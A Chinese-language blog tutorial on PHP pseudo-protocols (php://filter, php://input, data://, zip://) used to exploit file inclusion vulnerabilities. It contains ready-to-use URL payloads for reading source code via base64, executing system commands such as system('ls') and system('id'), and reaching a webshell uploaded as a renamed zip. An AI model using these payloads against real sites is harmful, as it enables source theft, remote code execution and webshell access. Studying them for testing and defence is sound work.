PHP伪协议-文件包含漏洞常用的伪协议

在实战中文件包含漏洞

php://filter

php://filter 协议可以对打开的数据流进行筛选和过滤,常用于读取文件源码

使用文件包含函数包含文件时,文件中的代码会被执行,如果想要读取文件源码,可以使用base64对文件内容进行编码,编码后的文件内容不会被执行,而是展示在页面中,我们将页面中的内容使用base64解码,就可以获取文件的源码了

使用base64对index.php文件进行编码,可以看到页面中展示了编码后的文件内容

?url=php://filter/read=convert.base64-encode/resource=index.php
PHP伪协议-文件包含漏洞常用的伪协议

 接下来我们将编码后的文件内容进行base64解密,可以得到文件源码

PHP伪协议-文件包含漏洞常用的伪协议

 

php://input

php://input 可以访问请求的原始数据,配合文件包含漏洞可以将post请求体中的内容当做文件内容执行,从而实现任意代码执行,需要注意的是,当enctype=multipart/form-data时,php:/input将会无效

?url=php://input				-- GET请求参数中使用php://input协议 <?php system('ls'); ?>			-- post请求体中的内容会被当做文件内容执行
PHP伪协议-文件包含漏洞常用的伪协议 PHP伪协议-文件包含漏洞常用的伪协议

 

data://

协议格式: data:资源类型;编码,内容

data://协议通过执行资源类型,使后面的内容当做文件内容来执行,从而造成任意代码执行

?url=data://text/plain,<?php system('id') ?>
PHP伪协议-文件包含漏洞常用的伪协议

 

zip://

ziip://协议用来读取压缩包中的文件,可以配合文件上传开启后门,获取webshell

将shell.txt压缩成zip,再将后缀名改为jpg上传至服务器,再通过zip伪协议访问压缩包里的文件,从而链接木马

?url=zip://shell.jpg

版权声明:玥玥 发表于 2021-08-21 0:43:39。
转载请注明:PHP伪协议-文件包含漏洞常用的伪协议 | 女黑客导航